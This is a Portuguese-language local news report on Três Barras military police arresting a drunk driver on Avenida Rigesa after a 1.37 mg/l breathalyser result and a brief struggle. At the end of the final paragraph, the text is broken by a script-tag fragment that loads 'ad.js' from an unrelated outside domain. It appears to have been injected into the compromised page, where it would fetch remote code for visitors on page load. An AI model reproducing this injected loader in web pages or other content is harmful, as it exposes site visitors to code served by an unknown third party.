InícioDestaquePM de Três Barras Prende Motorista que Dirigia Embriagado na Avenida Rigesa

PM de Três Barras Prende Motorista que Dirigia Embriagado na Avenida Rigesa

Últimas notícias

Operação contra abuso sexual em Canoinhas e Papanduva é considerada a maior da região

A operaçãoRespectus, deflagrada nesta quarta-feira (24) em Papanduva e...

Após denúncia polícia militar apreende arma sem registro em Três Barras

Na quarta-feira, 24, por volta das 16h, policiais militares...

Na segunda-feira, 13, por volta das 16h30, equipes da PM de Três Barras foram acionadas via Copom 190 para deslocar até a Avenida Rigesa, sentido Três Barras, averiguar um veículo em atitude suspeita, pois conforme informações, o condutor do veículo estaria embriagado.

 

No deslocamento a equipe PM se deparou com o veículo Fiat Palio Fire Economy transitando em zig zag. Ao ser abordado o condutor apresentava sinais de embriaguez, sendo este odor alcoólico, olhos vermelhos e com dificuldades em falar, o qual relatou para a equipe PM que bebeu para afogar as mágoas.

 

Oferecido o teste do bafômetro para o condutor, o qual realizou o teste, resultando em 1.37 mg/l, que após realizado o exame de embriaguez foi dado voz de prisão para o condutor, que não conformado com a situação correu para seu veículo, adentrando no mesmo, desobedecendo as ordens emanadas pelos policiais militares. Foi necessário o uso de força física “técnicas de imobilização”, para conter o condutor. O veículo foi removido ao pátio conveniado por falta de condutor habilitado para condução do mesmo.

 

Diante dos fatos o homem foi preso em flagrante e conduzido para providencias…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.